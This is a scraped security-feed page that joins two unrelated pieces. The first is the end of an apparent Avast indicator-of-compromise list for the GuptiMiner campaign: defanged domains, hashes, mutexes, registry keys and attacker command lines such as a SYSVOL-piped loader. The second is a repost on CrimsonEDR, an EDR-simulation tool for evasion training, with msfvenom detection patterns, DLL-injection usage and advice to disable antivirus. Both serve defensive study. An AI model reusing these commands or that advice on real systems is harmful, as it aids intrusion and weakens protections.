ns.desmoinesreg[.]com
ns.dreamsoles[.]com
ns.editaccess[.]com
ns.encontacto[.]net
ns.gravelmart[.]net
ns.gridsense[.]net
ns.jetmediauk[.]com
ns.kbdn[.]net
ns.lesagencestv[.]net
ns.penawarkanser[.]net
ns.srnmicro[.]net
ns.suechiLton[.]com
ns.trafomo[.]com
ns1.earthscienceclass[.]com
ns1.peepzo[.]com
ns1.securtelecom[.]com
ns1.sneakerhost[.]com
p.bramco[.]net
p.hashvault[.]pro
r.sifraco[.]com
spf.microsoft[.]com
widgeonhill[.]com
www.bascap[.]net

Mutexes 

Mutex 
ESOCESS_ 
Global\Fri Aug 13 02:17:49 2021 
Global\Fri Aug 13 02:22:55 2021 
Global\Mon Apr 19 06:03:17 2021 
Global\Mon Apr 24 07:19:54 2023 
Global\Mon Feb 27 08:11:25 2023 
Global\Mon Jun 14 03:22:57 2021 
Global\Mon Mar 13 07:29:11 2023 
Global\Mon Mar 22 09:16:00 2021 
Global\Sun Jun 13 08:22:07 2021 
Global\Thu Aug 10 03:25:11 2023 
Global\Thu Aug 12 02:07:58 2021 
Global\Thu Feb 23 08:37:09 2023 
Global\Thu Mar 25 02:03:14 2021 
Global\Thu Mar 25 09:31:19 2021 
Global\Thu Nov  2 08:21:56 2023 
Global\Thu Nov  9 06:19:40 2023 
Global\Tue Apr 25 08:32:05 2023 
Global\Tue Mar 23 02:37:32 2021 
Global\Tue Oct 10 08:07:11 2023 
Global\Wed Aug 11 09:16:37 2021 
Global\Wed Jan  5 09:15:56 2022 
Global\Wed Jun  2 09:43:03 2021 
Global\Wed Mar  1 01:29:48 2023 
Global\Wed Mar 23 08:56:01 2022 
Global\Wed Mar 23 09:06:36 2022 
Global\Wed May 10 06:38:46 2023 
Global1 
GlobalMIVOD_V4 
GMCM1 
MIVOD_6 
MTX_EX01 
Mutex_ONLY_ME_V1 
Mutex_ONLY_ME_V2 
Mutex_ONLY_ME_V3 
PROCESS_ 
SLDV014 
SLDV02 
SLDV024 
SLDV04 
SLDV10 
SLDV11 
SLDV13 
SLDV15 
SLDV17 
SLDV22 
SLDV26 

PDB paths 

PDB path
E:\projects\projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb
E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb
F:\CODE-20221019\Projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb
F:\Pro\MainWork\Release\MainWork.pdb
F:\Pro\MainWork\x64\Release\MainWork.pdb
F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-IPHLPAPI\Release\MainWork.pdb
F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-IPHLPAPI\x64\Release\MainWork.pdb
F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-nvhelper\Release\MainWork.pdb
F:\Projects\2020-NEW\20200307-NEW\MainWork-VS2017-nvhelper\x64\Release\MainWork.pdb
F:\Projects\RunCompressedSC\x64\Release\RunCompressedSC.pdb
F:\V202102\MainWork-VS2017 – Monitor\Release\MainWork.pdb
F:\V202102\MainWork-VS2017 – Monitor\x64\Release\MainWork.pdb
H:\projects\MainWork\Release\MainWork.pdb

Stage 0 – Installation Process 

IoC Note 
http://update3[.]mwti[.]net/pub/update/updll3.dlz  
c3122448ae3b21ac2431d8fd523451ff25de7f6e399ff013d6fa6953a7998fa3 C:\Program Files\eScan\VERSION.DLL 
7a1554fe1c504786402d97edecc10c3aa12bd6b7b7b101cfc7a009ae88dd99c6 updll65.dlz 

Stage 0.9 – Installation Improvements 

Stage 1 – PNG Loader 

IoC Note 
ff884d4c01fccf08a916f1e7168080a2d740a62a774f18e64f377d23923b0297  
ext.peepzo[.]com  
crl.peepzo[.]com  
ns1.peepzo[.]com  
http://www.deanmiller[.]net/m/  
294b73d38b89ce66cfdefa04b1678edf1b74a9b7f50343d9036a5d549ade509a  
185.45.192[.]43/elimp/  
6305d66aac77098107e3aa6d85af1c2e3fc2bb1f639e4a9da619c8409104c414
SYSTEM\CurrentControlSet\Control\Arbiters\Class Registry 
SYSTEM\CurrentControlSet\Control\CMF\Class Registry 
SYSTEM\CurrentControlSet\Control\CMF\CORE Registry 
SYSTEM\CurrentControlSet\Control\CMF\DEF Registry 
SYSTEM\CurrentControlSet\Control\CMF\Els Registry 
SYSTEM\CurrentControlSet\Control\CMF\ASN Registry 
SYSTEM\CurrentControlSet\Control\MSDTC\BSR Registry 

Stage 2 – Gzip Loader 

IoC Note 
357009a70daacfc3379560286a134b89e1874ab930d84edb2d3ba418f7ad6a0b  

Stage 3 – Puppeteer 

IoC Note 
364984e8d62eb42fd880755a296bd4a93cc071b9705c1f1b43e4c19dd84adc65  
C:\ProgramData\Microsoft\Crypto\Escan\dss.exe  
C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3   
C:\Windows\system32\tasks\Microsoft\windows\autochk\ESUpgrade Scheduled task 
HKEY_LOCAL_MACHINE\SOFTWARE\AVC3 Registry 
\Device\HarddiskVolume1\Program Files (x86)\eScan\download.exe  
4dfd082eee771b7801b2ddcea9680457f76d4888c64bb0b45d4ea616f0a47f21  
SOFTWARE\Microsoft\Windows NT\CurrentVersion\DNS Server Registry 
net group "domain computers" /domain Command 
https://m.airequipment[.]net/gpse/  
487624b44b43dacb45fd93d03e25c9f6d919eaa6f01e365bb71897a385919ddd  
C:\Program Files (x86)\eScan\updll3.dll3  
C:\Program Files\Common Files\SYSTEM\SysResetErr\SysResetErr.DLL  
C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellChecking.DLL  
C:\Program Files\Microsoft SQL Server\SpellChecking\MsSpellCheckingHost.DLL  
C:\ProgramData\AMD\CNext\atiadlxx.dll  
C:\ProgramData\Microsoft\Assistance\LunarG\vulkan-1.dll  
C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll  
C:\ProgramData\Microsoft\Crypto\Escan\updll3.dll3  
C:\ProgramData\Microsoft\Network\Escan\AutoWake.dll  
1c31d06cbdf961867ec788288b74bee0db7f07a75ae06d45d30355c0bc7b09fe  
1fbc562b08637a111464ba182cd22b1286a185f7cfba143505b99b07313c97a4  

Stage 4 – Backdoor 

IoC Note 
07beca60c0a50520b8dbc0b8cc2d56614dd48fef0466f846a0a03afbfc42349d  
E:\Projects\putty-src\windows\VS2012\x64\Release\plink.pdb PDB 
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CMF\Class Registry 
HKEY_LOCAL_MACHINE\SYSTEM\RNG\FFFF  Registry 
gesucht[.]net  
f0ccfcb5d49d08e9e66b67bb3fedc476fdf5476a432306e78ddaaba4f8e3bbc4  
HKEY_LOCAL_MACHINE\SYSTEM\Software\Microsoft\DECLAG Registry 
8446d4fc1310b31238f9a610cd25ea832925a25e758b9a41eea66f998163bb34 Shellcode 
74D7F1AF69FB706E87FF0116B8E4FA3A9B87275505E2EE7A32A8628A2D066549  
www.righttrak[.]net:443   
185.248.160[.]141  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PCB Registry 
af9f1331ac671d241bf62240aa52389059b4071a0635cb9cb58fa78ab942a33b  

Related and Future Research 

IoC Note 
"cmd.exe" /c type "\<domain>\SYSVOL\<domain>\scripts\gpon.inc" | "\<domain>\SYSVOL\<domain>\scripts\powAMD64.dat" -nop - Command 
C:\Windows\System32\Tasks\ScheduledDefrag Scheduled task 
529763AC53562BE3C1BB2C42BCAB51E3AD8F8A56 Certificate SHA1 
31070C2EA30E6B4E1C270DF94BE1036AE7F8616B Certificate SHA1 
31dfba1b102bbf4092b25e63aae0f27386c480c10191c96c04295cb284f20878  
8e96d15864ec0cc6d3976d87e9e76e6eeccc23c551b22dcfacb60232773ec049  
b0f94d84888dffacbc10bd7f9983b2d681b55d7e932c2d952d47ee606058df54  
f656a418fca7c4275f2441840faaeb70947e4f39d3826d6d2e50a3e7b8120e4e  
7f1221c613b9de2da62da613b8b7c9afde2ea026fe6b88198a65c9485ded7b3d  
F:\!PROTECT\Real\startW-2008\MainWork\Release\MainWork.pdb PDB 

The post GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining appeared first on Avast Threat Labs.

CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R
28 April 2024 at 12:30


CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Features

Detection Description
Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

Installation

To get started with CrimsonEDR, follow these steps:

  1. Install the dependency: sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: git clone https://github.com/Helixo32/CrimsonEDR
  3. Compile the project: cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

⚠️ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

Usage

To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
  2. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234
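
For reference, the idea behind the Custom Pattern Search feature can be sketched in a few lines of Python: load the byte patterns from ioc.json and look for them in a memory buffer. This is only our illustration of the concept, not CrimsonEDR's actual C implementation.

import json

def load_patterns(path="ioc.json"):
    with open(path) as f:
        return [bytes(int(b, 16) for b in pattern) for pattern in json.load(f)["IOC"]]

def scan_buffer(buffer, patterns):
    # returns the hex form of every known pattern found in the scanned bytes
    return [pattern.hex() for pattern in patterns if pattern in buffer]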

Useful Links

Here are some useful resources that helped in the development of this project:

Contact

For questions, feedback, or support, please reach out to me via:


